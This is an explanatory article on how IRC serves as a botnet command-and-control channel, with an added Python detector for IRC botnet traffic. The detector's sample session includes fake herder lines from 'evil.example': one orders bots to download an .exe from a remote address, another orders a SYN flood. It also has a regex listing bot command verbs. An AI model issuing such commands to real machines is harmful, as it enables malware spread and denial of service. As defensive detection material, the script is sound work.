IRC’s deadly side
Many Internet users have enjoyed the benefits of Internet Relay Chat (IRC): fast, convenient group communication that is accessible from almost anywhere in the world. But IRC has a downside in the world of botnets and cyber security attacks.
What is IRC?
Internet Relay Chat (IRC) is a protocol for real-time text messaging over the Internet, designed mainly for group communication in discussion channels (chat rooms).
IRC is powerful and universal: it runs on all major computer operating systems and is easy to reach. With up to 600,000 users, the potential for abuse is a worldwide problem.
Beyond the large number of public and private IRC server networks, IRC client software is available for almost every operating system that supports TCP/IP networking.
What are Botnets?
A botnet is a collection of compromised computers ("bots") that an attacker controls remotely, and as a destructive tool it takes many forms. Among its most destructive uses are distributed denial of service (DDoS) attacks, spamming and financial data theft and fraud.
Network Penetration and Control
There are many ways to get malicious code onto a network. A simple but risky example is to plant a USB drive loaded with innocuous-looking, attractive content that carries a hidden Trojan horse or other malware; because it requires physical proximity, this exposes the perpetrator to the risk of discovery.
Permitting unrestricted web browsing, including visits to unsafe or infected websites, is another route in, but it is hit-or-miss and can be curtailed through vigilant network administration.
By far the most dangerous tool for anonymous control of compromised machines, however, is IRC. IRC does not break into a computer by itself; it is the channel through which a knowledgeable perpetrator commands machines that have already been infected, and because IRC networks span the globe, that control can cause tremendous and often anonymous damage.
One of the easiest and most efficient ways to run a botnet is over IRC.
Botnet creation, control and the IRC
The steps in creating a botnet illustrate how easy it is, and the fact that botnet creators usually sell or rent their bots to malicious third parties for a fee:
1. The botnet operator infects targeted PCs with malicious code (Trojan horses and other destructive code). Each infected machine connects to an IRC server and joins a predetermined channel, and that server becomes the command and control (C&C) server through which the operator controls the entire network.
2. The resulting botnet is often sold or rented to a criminal or terrorist enterprise.
3. The buyer then sends instructions over the channel to trigger a distributed denial of service, spamming or data theft attack.
4. The attack causes significant damage, and attacks can be repeated at will.
A botnet's originator (also known as a "bot herder" or "bot master") controls the group remotely over IRC channels, usually for criminal or terror related purposes. The individual malicious programs running on the compromised clients are the "bots".
Control of the botnet usually runs through an IRC server, also known as the command and control server. Some of the latest botnets spread on their own using custom designed code, and these self-propagating botnets are potentially extremely destructive.
Large user networks, some of 20,000 users or more, are tempting targets for botnet operators, and many of them offer little resistance.
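What the steps above look like from the defender's side is a burst of JOINs by clients with templated nicknames into one channel, followed by command-style messages or topic changes from a single nick. The following script is an added example written for this page, not code from the original article or from any real bot family: it parses IRC messages in the RFC 1459 wire format, as an IDS or logging proxy at the network edge would see them, and flags channels showing both signals. The sample session, the nickname template, the command verbs, the channel name and the hosts are all constructed assumptions chosen for illustration.

```python
"""Heuristic detector for IRC botnet command-and-control traffic.

Parses IRC messages in the RFC 1459 wire format and flags channels that
show the pattern described in the article: a cluster of clients with
generated-looking nicknames joining one channel, and a "herder" pushing
command-style messages or topics to that channel.
"""
import re
from collections import defaultdict

# Constructed sample session, server-side view. Nicks, channel, hosts and
# command syntax are invented for illustration (the ".ddos" and ".update"
# verbs mimic the style of classic IRC bots, not any specific real family).
SAMPLE_LINES = """\
:alice!u@host1 JOIN #linux
:bob!u@host2 JOIN #linux
:alice!u@host1 PRIVMSG #linux :anyone tried the new kernel?
:USA|482913!x@10.0.0.5 JOIN #b0tz
:USA|771202!x@10.0.0.9 JOIN #b0tz
:DEU|103377!x@10.0.0.12 JOIN #b0tz
:GBR|558201!x@10.0.0.21 JOIN #b0tz
:herder!h@evil.example TOPIC #b0tz :.update http://198.51.100.7/upd.exe
:herder!h@evil.example PRIVMSG #b0tz :.ddos syn 203.0.113.9 80 600
:USA|482913!x@10.0.0.5 PRIVMSG #b0tz :[DDoS]: flooding 203.0.113.9
""".splitlines()

# <message> ::= [':' <prefix> <SPACE>] <command> <params> [' :' <trailing>]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)"
    r"(?P<params>(?: [^:\s]\S*)*)(?: :(?P<trailing>.*))?$"
)
# Generated nicks like "USA|482913": 2-4 letters, a separator, 4+ digits (assumed template).
BOT_NICK = re.compile(r"^[A-Za-z]{2,4}[|_\-\[]\d{4,}")
# Command verbs of the ".verb args" / "!verb args" style pushed to bots (assumed list).
BOT_CMD = re.compile(r"^[.!](ddos|syn|udp|update|download|scan|spam|stop)\b", re.I)


def parse_irc(line):
    """Split one IRC message into (nick, COMMAND, params, trailing) or None."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    nick = (m.group("prefix") or "").split("!", 1)[0]
    return nick, m.group("cmd").upper(), m.group("params").split(), m.group("trailing")


def analyze(lines, min_bots=3):
    """Return one alert dict per suspicious channel, sorted by channel name."""
    members = defaultdict(set)    # channel -> all nicks that joined
    botlike = defaultdict(set)    # channel -> nicks matching BOT_NICK
    commands = defaultdict(list)  # channel -> (nick, command text)
    for line in lines:
        parsed = parse_irc(line)
        if parsed is None:
            continue
        nick, cmd, params, trailing = parsed
        if cmd == "JOIN" and params:
            chan = params[0]
            members[chan].add(nick)
            if BOT_NICK.match(nick):
                botlike[chan].add(nick)
        elif cmd in ("PRIVMSG", "TOPIC") and params and trailing:
            chan = params[0]
            # Only channel traffic counts; private messages to a nick are ignored.
            if chan.startswith("#") and BOT_CMD.match(trailing):
                commands[chan].append((nick, trailing))
    alerts = []
    for chan in sorted(set(members) | set(commands)):
        bots, cmds = botlike.get(chan, set()), commands.get(chan, [])
        if len(bots) < min_bots and not cmds:
            continue  # an ordinary channel
        alerts.append({
            "channel": chan,
            "bot_like_nicks": len(bots),
            "herders": sorted({n for n, _ in cmds}),
            "commands": [t for _, t in cmds],
            # Both signals together is a strong C&C indicator.
            "severity": "high" if len(bots) >= min_bots and cmds else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES):
        print(alert)
```

Run against the sample, the #linux chatter is ignored and #b0tz is reported once at high severity with four bot-like nicks and one herder. In a real deployment the lines would be reassembled from the C&C server's TCP port (6667 by default, but operators pick arbitrary ports), BOT_NICK and BOT_CMD would be tuned to the family being hunted, and IRC wrapped in TLS leaves only connection metadata (many hosts opening long-lived sessions to one server) to work with.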
Attribution
Given the widespread reach of public and private IRC networks, anonymous channels, the widespread use of obfuscated or encrypted scripts, the sale of botnets to anonymous third parties and the fact that large networks in other countries are the most productive targets, attributing an attack to its actual source is often impossible.
Visitors to apparently safe or trusted sites that are secretly under the control of a botnet operator are easily fooled into downloading infected files and so expose themselves to attack. That a trusted site is located within the United States is no guarantee of safety, because IRC lets an attacker direct the bots behind even safe, trusted sites remotely and anonymously.
The difficulty of attribution is underlined by recent research (source: sans.org) concluding that an overwhelming number of cyber attacks on targets in the United States are carried out through domestic botnets, which pass malicious code to the greatest number of users.
Military and large commercial sites are priority targets, and attacks on them often disrupt commerce and risk the loss of classified data.
Cyber security attacks
Botnets give criminal or terrorist elements the ability to control large installations of networked computers. By anonymously compromising a single PC that belongs to a large network and tying it to a centralised command and control (C&C) server, a cyber attack perpetrator can monitor and anonymously control networks that individuals trust.
This control often goes unnoticed at the individual PC level and can be exercised across borders with little fear of discovery.
Anonymous and efficient penetration of large scale networks is the key to the success of botnets. While defensive measures against botnets are enjoying some success, the enemy is clever and innovative and the challenge is tremendous.
This article first appeared at: https://www.infosecisland.com/blogview/6992-Internet-Relay-Chat-and-the-Effect-of-Botnets-on-Security.html